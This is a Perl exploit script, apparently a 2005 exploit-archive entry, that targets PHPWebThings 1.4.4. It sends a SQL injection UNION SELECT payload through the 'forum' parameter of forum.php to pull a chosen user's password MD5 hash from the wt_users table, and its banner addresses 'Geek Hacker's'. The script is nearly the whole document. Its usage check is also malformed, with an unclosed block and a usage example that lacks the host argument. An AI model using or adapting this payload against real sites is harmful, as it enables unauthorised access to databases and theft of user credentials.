PHPWebThings 1.4 - 'forum' SQL Injection

Related Vulnerabilities: CVE-2005-4218   CVE-2005-4226  
Publish Date: 16 Nov 2005
Author: AhLam
#-      SQL injection in phpwebthing v 1.4.4
#-      Founder by Qptan & Exploting by AhLam
#-      www.leZe.Com Only For Geek Hacker's
#-      coded by AhLaM  A.1.M|at|
use LWP::Simple;

print "\n============================================\n";
print "\n   SQL injection in phpwebthing v 1.4.4    =  ";
print "\n   Founder by Qptan & Exploting by AhLam   =  ";
print "\n   www.leZe.Com Only For Geek Hacker's     =  ";
print "\n   Coded By AhLaM   A.1.M|at|         ";
print "\n============================================\n";

if(!$ARGV[0] or !$ARGV[1]) {
 print "\nUsage:\nperl $0 [host] [User ID] \n\nExample:\nperl $0 1\n";
$url = "/forum.php?forum=-1%20union%20select%20password,password,null,null%20from%20wt_users%20where%20uid=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/ - (.*?)<\/td>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

# [2005-11-16]